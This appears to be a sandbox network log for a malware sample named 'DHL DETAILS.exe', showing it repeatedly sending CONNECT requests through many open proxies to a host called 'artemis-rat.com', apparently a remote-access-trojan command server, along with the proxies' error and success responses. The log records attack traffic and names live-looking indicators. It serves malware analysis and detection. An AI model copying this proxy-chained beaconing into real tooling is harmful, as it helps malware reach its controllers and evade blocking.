Mar 9, 2024 13:14:15.536516905 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
840	192.168.2.5	52654	8.218.231.62	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.542236090 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
841	192.168.2.5	52641	150.109.243.156	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.545541048 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
842	192.168.2.5	52628	210.72.11.46	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.548026085 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.649162054 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
843	192.168.2.5	52589	202.162.219.10	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.560049057 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
844	192.168.2.5	52619	45.11.95.165	6035	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.561954021 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.380161047 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.567790031 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.677182913 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:23.880143881 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
845	192.168.2.5	50127	162.241.46.40	49401	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.563277960 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.723829031 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.833575964 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:27.833089113 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
846	192.168.2.5	52633	8.219.228.100	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.564775944 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
847	192.168.2.5	52684	91.189.177.190	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.573398113 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.898113012 CET	1286	IN	HTTP/1.1 403 Forbidden Server: squid/5.7 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/html;charset=utf-8 Content-Length: 3628 X-Squid-Error: ERR_ACCESS_DENIED 0 Vary: Accept-Language Content-Language: en X-Cache: MISS from lb1 X-Cache-Lookup: NONE from lb1:3128 Via: 1.1 lb1 (squid/5.7) Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. // Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
848	192.168.2.5	49992	117.30.118.200	8118	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.575233936 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.676846981 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.736804008 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:27.864520073 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
849	192.168.2.5	52682	185.49.31.207	8081	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.578811884 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
850	192.168.2.5	52795	44.190.9.65	48100	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.580292940 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
851	192.168.2.5	52588	94.20.183.172	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.582104921 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
852	192.168.2.5	52586	212.108.155.205	9090	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.583364964 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
853	192.168.2.5	52702	185.225.232.191	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.588509083 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.899264097 CET	805	IN	HTTP/1.1 500 Internal Server Error Date: Sat, 09 Mar 2024 12:14:15 GMT Server: Apache/2.4.57 (Debian) Content-Length: 613 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 37 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.57 (Debian) Server at artemis-rat.com Port 443</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
854	192.168.2.5	52735	15.236.106.236	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.595660925 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.893872976 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:15 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
855	192.168.2.5	52053	199.102.104.70	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.601526976 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
856	192.168.2.5	52755	46.35.9.110	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.609843016 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
857	192.168.2.5	52758	23.137.248.197	8888	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.611181974 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
858	192.168.2.5	51697	51.15.234.222	16379	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.613163948 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.723901033 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.833606005 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
859	192.168.2.5	52727	58.246.58.150	9002	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.615262985 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.935012102 CET	311	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
860	192.168.2.5	52801	98.162.25.29	31679	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.621504068 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
861	192.168.2.5	52639	193.151.130.114	8086	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.623102903 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
862	192.168.2.5	52507	111.206.0.99	8181	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.624898911 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.634102106 CET	162	IN	HTTP/1.1 200 Connection Established Accept-Ranges: bytes Content-Length: 0 Date: Sat, 09 Mar 2024 12:14:16 GMT Server: eJet/1.4.2 X-Nat-IP: 154.16.105.38

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
863	192.168.2.5	52804	72.206.181.105	64935	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.663006067 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
864	192.168.2.5	52635	103.190.54.141	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.663264990 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
865	192.168.2.5	52605	90.188.250.16	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.663343906 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
866	192.168.2.5	50232	162.240.231.211	62109	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.663460016 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.723901987 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
